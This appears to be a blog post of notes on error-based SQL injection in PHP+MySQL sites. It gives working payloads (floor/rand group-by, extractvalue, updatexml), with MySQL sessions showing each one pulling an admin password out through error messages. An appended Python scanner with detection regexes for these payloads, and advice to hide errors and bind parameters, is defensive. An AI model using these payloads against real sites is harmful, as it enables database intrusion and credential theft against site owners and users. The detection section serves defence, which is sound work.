Posting some of my old notes. MySQL throws an error message when a statement fails, and PHP+MySQL sites often display that error text on the page, so specific data can be pulled out through the error message by constructing any of the three techniques below.

Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1. Error via floor()

Some payloads that can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));

Example:

First, a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is leaked in the error (the trailing 1 is the floor(rand(0)*2) digit appended to the value). To retrieve other data, replace the version() call with the query for the data you want.

For example, to get the admin username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'

All, thanks foreign guys.
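As an added defender-side example (my code, not part of the original notes): a small Python scanner that flags the three error-based payload shapes from the notes in URL-encoded request lines, and a check for whether a response body echoes the kind of MySQL error (ERROR 1062 / ERROR 1105) that carries data out, which is the precondition all three techniques rely on. The signature names, function names and sample request lines are constructed for this example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Shapes of the three error-based payloads from the notes (signature names are mine);
# case-insensitive and tolerant of whitespace between tokens.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
}

# MySQL error text that carries a value out to the client (ERROR 1062 and ERROR 1105
# in the notes); the named group holds the leaked value.
LEAKY_ERROR = re.compile(r"Duplicate entry '(?P<dup>[^']*)' for key"
                         r"|XPATH syntax error: '(?P<xp>[^']*)'")

def classify_request(raw_request: str) -> List[str]:
    """Names of the payload signatures present in a URL-encoded request line."""
    decoded = unquote_plus(raw_request)  # match the decoded form, which is what MySQL sees
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def leaked_value(response_body: str) -> Optional[str]:
    """Value carried by a MySQL error echoed in the response body, or None if clean."""
    m = LEAKY_ERROR.search(response_body)
    if m is None:
        return None
    return m.group("dup") if m.group("dup") is not None else m.group("xp")

def scan(requests: List[str]) -> List[Tuple[int, List[str]]]:
    """(index, signatures) for every request that matches at least one signature."""
    return [(i, sigs) for i, r in enumerate(requests) if (sigs := classify_request(r))]

# Constructed sample request lines (the notes' payloads, URL-encoded) for the example.
SAMPLE_REQUESTS = [
    "/article.php?id=1",
    "/article.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),"
    "floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",
    "/article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20pass%20from%20admin%20limit%201)))",
    "/article.php?id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20user()),0x5e24),1))",
]

if __name__ == "__main__":
    for i, sigs in scan(SAMPLE_REQUESTS):
        print(f"request {i}: {', '.join(sigs)}")
    print(leaked_value("ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'"))
```

A positive result from leaked_value on your own application's responses means database errors are being echoed to clients; the fix is to log them server-side instead of displaying them and to pass id as a bound parameter rather than concatenating it into the SQL.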